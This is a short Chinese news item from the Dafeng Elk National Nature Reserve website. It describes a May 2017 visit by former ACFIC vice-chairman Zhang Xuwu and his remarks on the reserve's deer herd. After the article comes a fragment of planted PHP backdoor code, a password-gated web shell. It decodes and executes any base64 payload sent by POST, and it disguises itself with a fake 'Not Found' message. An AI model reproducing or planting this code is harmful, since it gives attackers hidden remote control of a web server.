最新要闻

首页 > 最新要闻 >

    全国工商联原常务副主席张绪武来麋鹿保护区参观考察

               2017年5月24日,全国工商联原常务副主席张绪武来麋鹿保护区参观考察。盐城市委常委、大丰区委书记王荣,盐城政协副主席、江苏省大丰麋鹿国家级自然保护区管理处主任孙大明陪同。

     

    张绪武一行驻足中华麋鹿园广场,环顾周围,感慨保护区变化发展的如此大、如此好。他说,“1986年,39头麋鹿从英国远涉重洋回到江苏大丰麋鹿保护区时,我亲眼见证了这一切。”随后张绪武在休息大厅观看了麋鹿电教片《归来的麋鹿》,并乘坐电瓶游览车进入半野生麋鹿生活区。成群结队的麋鹿在滩涂湿地中行走,他看到麋鹿的膘情状态如此之好,种群繁衍如此之旺盛,感到无比欣慰。张绪武对麋鹿保护区在保护麋鹿及南黄海湿地中作出的努力和发展生态旅游对周边经济作出的贡献表示肯定,并赞扬麋鹿保护区谱写了人与自然和谐发展的新篇章。

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>